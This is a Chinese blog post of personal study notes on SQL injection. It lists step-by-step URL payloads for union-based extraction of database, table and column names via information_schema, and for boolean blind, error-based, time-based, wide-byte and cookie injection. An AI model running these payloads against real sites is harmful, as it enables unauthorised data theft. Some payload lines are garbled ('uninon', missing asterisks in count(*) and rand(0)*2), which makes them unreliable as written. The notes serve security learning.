笔记: SQL注入

于 2023-02-18 16:32:29 发布
阅读量93 收藏 1
点赞数
分类专栏: 网络安全 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43981050/article/details/129057098
版权

一、union联合查询

1.先判断有无数字型注入点
?id=1 and 1=1
?id=1 and 1=2
若显示内容不同则存在注入点,若相同,
再判断有无字符型注入点
?id=1’
报错则为字符型注入

2.猜测注入点数量
?id=1 order by 2

3.查询显示字段
?id=1 and 1=2 uninon select 1,2
找出显示出错处

4.查询当前数据库名
?id=1 and 1=2 union select 1,database()

5.查询所有数据库名
?id=1 and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata

6.查询数据库里的所有表名
?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=数据库名

7.查询特定表的所有字段名
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=数据库名 and table_name=表名

8.查询值
?id=1 and 1=2 union select 1,字段名 from 表名

二、布尔盲注

1.查看现象,能报错,但没有报错信息,正确查询也显示不了查询内容就属于布尔盲注,只存在两种状态,对或错;
2.由页面的两种不同返回的状态来判定我们的闭合规则;
3.为了方便,我们这里假设返回正确用“yes”,返回错误用“no”来表示这两种状态
4.找到闭合规则后,我们在闭合规则里面 and 1=1 和 and 1=2 测试一下,看看最后返回是不是两种状态;
5.布尔盲注要用到length()和substr()语句,用两种状态来猜解数据库、表名等的长度和正确字母;
6.先用 and length(database())>2 来猜数据库的长度,使用的是二分法;
7.再用 and substr(database(),1,1)=‘t’ 来确定第一个字母,可用burp跑,26个字母,哪个字母返回yes则代表第一个字母就是它;
and substr(database(),2,1)=‘t’ 代表当前数据库的第二个字母;
8.最后结合长度,成功的将数据库猜解出来;
9.后面的操作跟union注入的步骤差不多了。

三、报错注入

1.注入点有报错信息
2.找到闭合规则
3.updatexml函数
and updatexml(1,concat(0x7e,(select database()),0x7e),1)
4.count(*) floor(rand(0)2)
and select 1 from (select count(),concat((database()),floor (rand(0)2))x from information_schema.tables group by x)
或 select count() from information_schema.tables group by concat((database()),floor (rand(0)*2)

四、时间盲注

不管对错只返回一种信息,用sleep()可以延迟执行
sleep() 、 get_lock()

五、宽字节注入

单双引号被转义成反斜杠,但数据库用的是GBK编码
%df%5c 是汉字
%df’ and 1=2 union select database()

六、COOKIE注入

1.寻找形如“.asp?id=xx”类的带参数的URL。
2.去掉“id=xx”查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。
3.清空浏览器地址栏,输入“javascript:alert(document.cookie=“id=”+escape(“xx”));”,按Enter键后弹出一个对话框,内容是“id=xx”,
然后用原来的URL刷新页面,如果显示正常,说明应用是用Request(“id”)这种方式获取数据的。
4.重复上面的步骤,将常规SQL注入中的判断语句带入上面的URL:“javascript:alert(document.cookie=“id=”+escape(“xx and 1=1”));”
“javascript:alert(document.cookie=“id=”+escape(“xx and 1=2”));”。
和常规SQL注入一样,如果分别返回正常和不正常页面,则说明该应用存在注入漏洞,并可以进行cookie注入。
5.使用常规注入语句进行注入即可。

总结:本文章为个人整理笔记,如有错误,欢迎各位师傅指正

明丨通
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入详解
m0_67391121的博客
07-28 3680
WAF(WebApplicationFirewall)的中文名称叫做“Web应用防火墙”,利用国际上公认的一种说法,WAF的定义是这样的Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。通过从上面对WAF的定义中,我们可以很清晰的了解到,WAF是一种工作在应用层的、通过特定的安全策略来专门为Web应用提供安全防护的产品。...
SQL注入和XSS攻击
neverSaynever_的博客
02-20 1665
攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。这里不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。
解决sql注入问题以及xxs跨站防范
qq_53814990的博客
04-22 364
sql注入: 在安全等级较低的网站的用户登录界面用户名处输入万能密码admin’ or 1=1 --',密码处输入任意字符,点击登录,可以绕过后台登录系统。 使用PreparedStatement方法完成SQL语句的执行,该方法要求在执行SQL语句之前,必须告诉JDBC哪些值作为输入参数,解决了普通Statement方法的注入问题,极大的提高了SQL语句执行的安全性。 //不存在sql注入问题 String sql="select * from tb_user where user_name=? and
SQL注入(一)
qq_48947141的博客
09-19 113
注入类型
SQL注入学习详细过程
liwenqianye的博客
04-19 720
sql注入学习笔记一、union注入1.判断是否存在注入:2.加粗样式查询字段数量3.查询SQL语句插入位置4.获取数据库库名5.获取表名6.获取字段名7.获取数据union注入PHP代码二、Boolean注入mysql的几个内置函数:1.判断注入点2.判断数据库的长度3.获取数据库的名字4.获取表的总数5.获取第一个表的长度6.获取表的内容7.获取表的字段总数三、报错注入报错函数3.extractvalue()4.rand()+group()+count5.几何函数6.不存在的函数7.bigint数值操作
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
SQL注入笔记-union联合查询
最新发布
03-21
SQL注入笔记-union联合查询
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记 手工注入是指攻击者通过构造特殊的输入来inject恶意的 SQL 代码,使得数据库执行恶意的操作。手工注入常用 SQL 语句笔记MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍。 一、...
sql注入经典案例重现,再带你了解黑客技术
La victoria的博客
11-30 641
经过了我们前段时间的sql注入学习,今天我们来深入学习一下sql注入之cookie注入 首先我们打开靶场环境 随便点开一篇文章 尝试在结尾构造一下 and 1=1 可见是使用了防注入的,但是目前我们是使用get方式提交的参数,我们将id=171包括后面的全部删除一下试试 显示数据库出错 这里存在cookie注入,首先我们恢复成原来的界面 然后我们下载一个...
常见sql注入语句和xss注入语句
小白博客
12-22 2925
1 and 1=1 或者1' and '1'='1 判断注入的类型 1 order by 1,2,3,4 数字类型为例;判断当前表存在多少个属性字段1' union select 1,table_name from information_schema.tables where table_schema=database()# 通过占位获取的数据库名 去MySQL的元数据表information_schema中查表名1' union select 1,c...
常见SQL注入手法
weixin_57048716的博客
11-26 1659
1.联合查询 2.伪静态注入 3.宽字节注入 4.报错注入 5.基于布尔盲注 6.基于延时的盲注 7.堆叠注入 8.二次注入
sql注入及盲注漏洞
热门推荐
liuy_uzhi的博客
07-24 1万+
1、发现和利用sql注入漏洞的基本流程: 首先找到有数据库交互的功能页面---判断页面是否存在sql注入--利用sql注入漏洞读取数据--导出所需数据 sql 注入的基本步骤(这个跟sqlmap的步骤基本一致吧) (1)判断是什么类型注入,有没过滤了关键字,可否绕过 (2)获取数据库用户,版本,当前连接的数据库等信息 (3)获取某个数据库表的信息 (4)获取列信息 (5)最后就获取数据了 2...
sql注入 js脚本注入 html入侵(自己收集的一些解决方案)欢迎指正
alleged的博客
01-12 1万+
sql注入 js脚本注入 html入侵sql注入简介通俗的讲,SQL注入就是恶意黑客或者竞争对手利用现有的B/S或者C/S架构的系统,将恶意的SQL语句通过表单等传递给后台SQL数据库引擎执行。比如,一个黑客可以利用网站的漏洞,使用SQL注入的方式取得一个公司网站后台的所有数据。试想一下,如果开发人员不对用户传递过来的输入进行过滤处理,那么遇到恶意用户的时候,并且系统被发现有漏洞的时候,后果将是令人
SQL 注入之二次注入
Myu_wzy的博客
12-30 6137
二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到 SQL 查询语句所导致的注入。防御者可能在用户输入恶意数据时,对其中的特殊字符进行了转义处理;但在恶意数据插入到数据库时,被处理的数据又被还原并存储在数据库中,当 Web 程序调用存储在数据库中的恶意数据并执行 SQL 查询时,就发生了 SQL 二次注入。
mybatis防止sql注入
weixin_42992109的博客
10-09 494
在编写MyBatis的映射语句时,尽量采用#{xxx}这样的格式。若不得不使用${xxx}这样的参数,要手工地做好过滤工作,来防止SQL注入攻击。 #{}:相当于JDBC中的PreparedStatement ${}:是输出变量的值 #{}是经过预编译的,是安全的;${}是未经过预编译的,仅仅是取变量的值,是非安全的,存在SQL注入。 ...
sql部分注入方式的学习
quan9i的博客
03-14 3434
前言 近期在进行sql注入实战的时候发现一些注入方式并不是很擅长运用,在这里对此进行总结,希望能对正在学习sql注入的师傅们有所帮助 堆叠注入 原理 在SQL中,分号(;)是用来表示一条sql语句的结束,那我们在一句SQL语句结束后再紧跟一句SQL语句 ,此时会不会执行两条语句 答案是会,堆叠注入正是基于这种思想而来。 举个简单例子 mysql> select(ascii('a'));show tables; +--------------+ | (ascii('a')) | +-----------
MSSQL手工注入实战:SQL注入漏洞探索
"SQL注入之MSSQL注入MSSQL手工注入" 本文主要探讨了SQL注入攻击中的MSSQL注入,特别是在Windows Server 2008 R2环境下使用IIS搭建的MSSQL-SQLi-Labs第一关的实战演练。作者以学习笔记的形式,详细介绍了如何识别和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值